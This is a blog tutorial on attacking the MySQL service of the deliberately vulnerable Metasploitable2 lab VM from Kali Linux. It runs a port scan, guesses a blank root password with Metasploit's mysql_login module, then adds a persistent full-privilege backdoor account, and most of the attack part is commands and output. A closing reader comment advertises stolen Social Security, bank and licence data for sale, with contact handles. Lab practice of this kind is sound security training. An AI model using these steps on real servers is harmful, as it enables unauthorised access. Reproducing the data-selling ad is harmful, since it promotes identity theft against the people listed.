Sunday, 7 June 2015

Metasploitable2 : Hack MySQL Server using Metasploit in Kali Linux

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. For Instructions on how to install Metasploitable 2 Virtual Machine in KVM, refer to this post.

In a previous post , we carried out a Vulnerability Scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali LInux.  

In this post, we will hack MySQL Server using Metasploit in Kali Linux.

We have the following scenario:

Metasploitable2 IP Address: 192.168.122.74
Kali Linux IP Address:           192.168.122.115  

Perform the following steps on the Kali Linux machine:

1) We perform a port scan on the Metasploitable machine and see that the mysql port is open.
root@kali:~# nmap -p 3306 192.168.122.74

Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-07 11:09 IST
Nmap scan report for 192.168.122.74
Host is up (0.00062s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
MAC Address: 00:0C:29:FA:DD:2A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds



2) We will try to hack the password for 'root' user. We will try blank password and see if it works.
 
root@kali:~# msfconsole

msf > search mysql

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > set RHOSTS 192.168.122.74
RHOSTS => 192.168.122.74
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(mysql_login) > exploit

[*] 192.168.122.74:3306 MYSQL - Found remote MySQL version 5.0.51a
[!] No active DB -- Credential data will not be saved!
[!] No active DB -- Credential data will not be saved!
[+] 192.168.122.74:3306 MYSQL - Success: 'root:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sf auxiliary(mysql_login) > quit
root@kali:~#


3) We are lucky. Now we will log in to the mysql server with user 'root' and blank password.

root@kali:~# mysql -u root -h 192.168.122.74


3) We create a user 'shabbir' with password 'shabbir' having full administrative control over the mysql database.

mysql> grant all on *.* to shabbir@192.168.122.115 identified by 'shabbir';
Query OK, 0 rows affected (0.00 sec)

mysql> quit
Bye


4) We can now log in to the mysql database whenever we want with username 'shabbir' and password 'shabbir' and have full administrative access.

root@kali:~# mysql -u shabbir -h 192.168.122.74 -p
Enter password:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.00 sec)















1 comment:

  1. Hi All!

    I'm selling fresh & genuine SSN Leads, with good connectivity. All data properly checked & verified.
    Headers in Leads:

    First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank Name | DL Number | Routing Number | IP Address | Reference | Email | Rental/Owner |

    *You can ask for sample before any deal
    *Each lead will be cost $1
    *Premium Lead will be cost $5
    *If anyone wants in bulk I will negotiate
    *Sampling is just for serious buyers

    Hope for the long term deal
    For detailed information please contact me on:

    Whatsapp > +923172721122
    email > leads.sellers1212@gmail.com
    telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete